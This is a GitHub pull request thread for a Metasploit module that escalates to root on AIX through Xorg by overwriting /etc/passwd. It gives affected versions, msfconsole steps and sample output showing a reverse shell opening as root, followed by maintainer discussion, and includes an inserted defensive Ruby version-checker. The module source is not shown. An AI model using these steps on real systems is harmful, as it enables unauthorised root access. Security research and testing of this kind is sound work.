
Add exploit module for Xorg X11 Server Local Privilege Escalation on AIX #11390

Merged
merged 9 commits into from Nov 11, 2019

Conversation

@dzflack
Contributor

dzflack commented Feb 12, 2019

Add Xorg X11 Server Local Privilege Escalation module for AIX.

This module adds the ability to escalate privileges on AIX by overwriting /etc/passwd using Xorg.

I felt the differences between the existing xorg multi exploit and this module warranted the addition of a new module as opposed to modifying the existing one.

The differences include:

  • Use of different Xorg parameter
  • Method of escalation (overwriting /etc/passwd instead of crontab; this is done because the file to be overwritten has to be accessible by an unprivileged user, which the crontab is not on AIX)
  • Payload type (only simple cmd perl payloads supported)

Vulnerable Applications

This module has been tested successfully on:

  • AIX 7.1 with Xorg 7.2.3.0
  • AIX 7.2 with Xorg 7.2.3.0

This table lists all vulnerable Xorg fileset versions (as documented by IBM):

Lower level   Upper level
6.1.9.0       6.1.9.100
7.1.4.0       7.1.4.30
7.1.5.0       7.1.5.31
7.2.0.0       7.2.0.1
7.2.1.0       7.2.1.0
7.2.2.0       7.2.2.0
7.2.3.0       7.2.3.15

Verification Steps

  1. msfconsole
  2. Get a session
  3. use exploit/aix/local/xorg_x11_server
  4. set session <session>
  5. set LHOST <lhost>
  6. set LPORT <lport>
  7. set writabledir <writabledir>
  8. run
  9. Verify you get a root session

Example Output

msf5 exploit(aix/local/xorg_x11_server) > set session 1
session => 1
msf5 exploit(aix/local/xorg_x11_server) > set writabledir /tmp
writabledir => /tmp
msf5 exploit(aix/local/xorg_x11_server) > run

[*] Started reverse TCP handler on 0.0.0.0:8888
[*] Xorg version is 7.2.3.0
[*] Retrieving currently logged in users
[*] Writing to /tmp/wow.ksh
[*] Backing up /etc/passwd to /tmp/passwd.backup
[*] Executing /tmp/wow.ksh
[*] Checking if we are root
[+] Got root!
[*] Writing to /tmp/wowee.ksh
[*] Executing shell payload
[*] Restoring original /etc/passwd
[*] Command shell session 2 opened (172.17.0.2:8888 -> 172.17.0.1:32948) at 2019-02-11 15:42:56 +0000
[+] Deleted /tmp/wow.ksh
[+] Deleted /tmp/passwd.backup
[+] Deleted /tmp/wowee.ksh

id
uid=0(root) gid=0(system)
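As an added example (not part of this PR or of the Metasploit module), a Ruby check that an administrator can use to compare an installed AIX Xorg fileset version against the IBM vulnerable ranges reproduced in the table above; the host names and versions in the sample inventory are constructed, and the fileset name is not taken from the page.

```ruby
# Added example (not part of this PR or of Metasploit): checks an AIX Xorg
# fileset version against the vulnerable ranges IBM documented for this issue,
# as reproduced in the PR description's table. Ranges are inclusive at both ends.
VULNERABLE_RANGES = [
  ['6.1.9.0', '6.1.9.100'],
  ['7.1.4.0', '7.1.4.30'],
  ['7.1.5.0', '7.1.5.31'],
  ['7.2.0.0', '7.2.0.1'],
  ['7.2.1.0', '7.2.1.0'],
  ['7.2.2.0', '7.2.2.0'],
  ['7.2.3.0', '7.2.3.15'],
].freeze

# Parse a dotted AIX VRMF string ("7.2.3.0") into an array of integers so that
# comparison is numeric per component ("7.2.3.15" is newer than "7.2.3.9").
def parse_vrmf(str)
  parts = str.strip.split('.')
  unless parts.size == 4 && parts.all? { |p| p.match?(/\A\d+\z/) }
    raise ArgumentError, "bad VRMF: #{str.inspect}"
  end
  parts.map(&:to_i)
end

# Return the matching [lower, upper] range if +version+ is vulnerable, else nil.
def vulnerable_range_for(version)
  v = parse_vrmf(version)
  VULNERABLE_RANGES.find do |lower, upper|
    (parse_vrmf(lower) <=> v) <= 0 && (v <=> parse_vrmf(upper)) <= 0
  end
end

def vulnerable?(version)
  !vulnerable_range_for(version).nil?
end

# Assess an inventory of host => fileset version (as collected, for instance,
# from `lslpp -L` on each LPAR) and report which hosts sit in a listed range.
def assess(inventory)
  inventory.to_h { |host, ver| [host, vulnerable?(ver)] }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inventory, not real hosts.
  sample = { 'aix71-lpar' => '7.1.5.31', 'aix72-lpar' => '7.2.3.16', 'aix72-old' => '7.2.3.0' }
  assess(sample).each do |host, vuln|
    puts "#{host}: #{vuln ? 'VULNERABLE (in a listed range)' : 'not in a listed range'}"
  end
end
```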

@dzflack

Contributor Author

dzflack commented Mar 4, 2019

Hiya @bcoles , anything I can help out further on this PR?

@aringo

Contributor

aringo commented Mar 29, 2019

I had been messing around with the modulepath way of exploiting this before I got busy on other things and I was about to go back to it. Does the method work for AIX? It's in an earlier PR - #11025 It works on Solaris and Centos with SELINUX enforcing (doesn't overwrite a core file). Can you let me know where you got an AIX box?

@dzflack

Contributor Author

dzflack commented Apr 12, 2019

@aringo I did initially try the modulepath method when targeting AIX, however I could not get it to work (can't remember the specifics of why). Getting the file override method to work did take a fair bit of tweaking on AIX, due to some AIX specific quirks.
I got access to an AIX box through my employer.

@aringo

Contributor

aringo commented Apr 12, 2019

Did you want to include this into the first module since it's multi? Make selecting password an option and auto for AIX. Sometimes stuff sits for a while if the testers don't have access to the OS/software setup. I'm very jealous about the AIX access as I had looked at renting an account or buying a system on ebay, way more money than I was comfortable with. Wanted to do things like work through this blog post https://rhinosecuritylabs.com/research/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ and try to make a module for it - there is a POC - if you are interested.

@dzflack

Contributor Author

dzflack commented Apr 15, 2019

I originally thought it was best to have it in a separate module as pretty much all the logic is focused on AIX specific quirks:

  • Different Xorg parameter used
  • Vulnerable versions of the binary are different
  • /etc/passwd is overwritten as the crontab is inaccessible
  • A newline is injected when overwriting /etc/passwd
  • All currently logged in users need to be included when overwriting /etc/passwd

However it looks like this PR might be dead, so if you believe that it will help get the code landed, and the above fits in with your module, then go ahead.

Yep I did rent an AIX box for a couple of days when validating that the module worked on both AIX 7.1 and 7.2; the site I used was SiteOx. They seemed to be fairly legit, but be as cautious as you usually are when giving a random website your credit card details ¯\_(ツ)_/¯

@bcoles

Contributor

bcoles commented Apr 17, 2019

However it looks like this PR might be dead

PR isn't dead, just sleeping, likely due to no-one having an AIX box to test, and lack of developer time.

@dzflack

Contributor Author

dzflack commented Apr 22, 2019

PR isn't dead, just sleeping, likely due to no-one having an AIX box to test, and lack of developer time.

That's understandable. If I was potentially able to obtain once off access to an AIX box for testing, would you be willing to take the reins on this one?

@bwatters-r7

Contributor

bwatters-r7 commented Sep 18, 2019

@dzflack I'll take on landing this, but I will ask a couple favors:

  1. You have the warning about /etc/password damage in the bottom half of the docs. Please put it near the top; possibly even the first line as a warning.
  2. If you can, please send a screen video of it working. Something like shareX or other application will work fine.
@bwatters-r7 bwatters-r7 self-assigned this Sep 18, 2019

@dzflack

Contributor Author

dzflack commented Sep 20, 2019

@bwatters-r7 thanks for picking this up. I have added the warning as requested, please let me know if it's suitable or if you want me to add more about the actual consequences.

Unfortunately I no longer have access to an AIX box as I have recently changed employer. If a screen capture of the exploit successfully executing is definitely needed, I could rent access to an AIX box; however this will cost $20 for a couple minutes of use, so am not too keen on that if it can be avoided :P

@bwatters-r7

Contributor

bwatters-r7 commented Oct 24, 2019

I'm going to try our snazzy "needs-testing" label to see if someone in the community can verify this..... @ccondon-r7 ;-)

@dzflack

Contributor Author

dzflack commented Nov 10, 2019

@bwatters-r7 I went ahead and rented an AIX box to demonstrate the module working; please see the link below for recording. I'll have access to the box for the next 24 hours, and am happy to share the access if you were wanting to test the module yourself?

Vimeo Module Demo

@h00die

Contributor

h00die commented Nov 10, 2019

This vimeo video would be a good thing to post in the module docs btw

@bwatters-r7

Contributor

bwatters-r7 commented Nov 11, 2019

@dzflack Thanks! I'm going to do a few tweaks on the documentation and module hash, but I should be able to get this through today! No need to share access, the video is great.

bwatters-r7 added a commit that referenced this pull request Nov 11, 2019
…scalation on AIX

Merge branch 'land-11390' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 7ea19c7 into rapid7:master Nov 11, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
@bwatters-r7

Contributor

bwatters-r7 commented Nov 11, 2019

I did a quick add of the video and SideEffects while landing.

msjenkins-r7 added a commit that referenced this pull request Nov 11, 2019
…scalation on AIX

Merge branch 'land-11390' into upstream-master
@bwatters-r7

Contributor

bwatters-r7 commented Nov 11, 2019

Release Notes

This PR adds a privilege escalation exploit module targeting the Xorg11 server on some AIX versions. It is similar to our existing generic Xorg11 SUID exploit module, but there are a few tweaks that make this module work with AIX in particular.

@dzflack

Contributor Author

dzflack commented Nov 12, 2019

Awesome! Thanks for getting this landed @bwatters-r7.
